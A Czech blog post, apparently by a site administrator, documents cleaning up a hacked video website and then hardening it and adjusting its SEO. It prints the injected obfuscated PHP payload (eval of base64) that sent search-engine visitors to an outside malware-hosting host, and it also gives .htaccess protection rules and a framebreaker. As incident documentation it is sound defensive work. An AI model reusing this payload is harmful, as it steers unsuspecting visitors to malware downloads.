Popis: SOLVED - Kontrola indexace google zobrazila stránky přesměrovávané na vir. Obnoveno ze zálohy. Ochrana proti dalšímu vniknutí. Oprava a změna titulku.
Blog
-
SEO
|
Napsal uživatel Administrator
|
Pondělí, 10 Říjen 2011 20:24
|
Kontrola indexace google:
duplicitní titulek, popis dobry,

Odkazy jsou přesměrovány javascript

dál směruje na stažení viru, maskovanej za rádoby antispyware.

wamos test
shrnutí:
- vyřešit (obrovský) problém redirectu indexovaných stránek na vir
- pak se uvidí,
pokračování 15.10.2011
v skriptu nalezeny pasáže
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICgh
JHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnP
SRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaX
N0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzd
HJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikg
b3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iK
SBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYX
BvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIs
IndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyK
CRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi
5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJ
HJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3
RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2
dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0c
igkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIp
KSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsI
mludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9zdGJqYnBpci5vc2EucGwvIik7
DQoJZXhpdCgpOw0KfQ0KfQ0KCX0NCgl9")); echo $sett["keywords"]; ?>" />
pozn. kodovaný skript byl v jednom řádku, kvůli formátování sem musel nasekat na řádky generátor stránek obnoven ze zálohy, redirecty zmizely , voala 
ochrana proti dalšímu vniknutí
- stránky (generátor) sice obnoveny, ale zůstaly bezpočnostní díry (ve ftp). Druhý den byl opět cizí kódovaný skript v php souborech.
- standardně nakopírován prázdný soubor index.html
- htaccess protekce složky s obrázky
#.htaccess to prevent access to .php files
<Files *.php>
Order Deny,Allow
</Files>
### This part says to deny access to EVERYTHING. Afterwards, you'll allow access to JUST the permitted items. See next FilesMatch section.
<FilesMatch .*>
Order Deny,Allow
Deny from all
</FilesMatch>
### NOTE: Add only appropriate PERMITTED filetypes to this list, depending on which folder you're protecting:
<FilesMatch .*\.(JPG|jpg|JPEG|jpeg|GIF|gif|PNG|png|pdf|PDF)>
Order Deny,Allow
Allow from all
</FilesMatch>
# This code can help for directories where "NO" script should be run from
# but for whatever reason, you need Directory permissions to be 777 - which is wide-open and insecure by itself.
# Examples Directories would include: any 'images' dir., the 'bmz' dir. if using ImageHandler 2, the html_includes languages folder, etc
# Prevent directory viewing and the ability of any scripts to run.
# No type of script, be it PHP, PERL or whatever can normally be executed if ExecCGI is disabled.
OPTIONS -Indexes -ExecCGI
pokračování 16.10.2011
změna / doplnění titulku
- změna titulku z formátu [site title] - [videa] - [video] na - [video] | [kategorie] | [site title]
- změna titulku kategorie, privat, podobně jako videa
- doplnění doplněny titulky stránky [nove] a [nej] k strance nove a nej
- dolpnění stránky do titulku
- doplněn titulek stránky hledání o [hledani] [slovo]
zabezpečení proti vniknutí práva soubory a adresáře
- 775 pro diry
- 644 pro soubory php
zlomení frames - ochrana protí "kradení" stránek přes iframe
- smelina.cz používala iframe a zobrazovala pocko.cz, to by snad tolik nevadilo, kdyby smelina.cz nebyla na prvnim miste ve vyhledávání.
- nejprve ošetřeno v souboru .htaccess
#smelina.cz zakazano
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?smelina\.cz/ [NC]
RewriteRule .*\..*$ http://i.imgur.com/qX4w7.gif [L]
- smelina.cz za několik měsíců zareagovala a iframe stáhla, přeto k ochraně pře podobnými praktikami vložen framebreaker nahoru za <body>, funguje výborně
<script type="text/javascript">
if (top.location != self.location) top.location = self.location;
</script>
|
Aktualizováno Neděle, 19 Únor 2012 21:24
|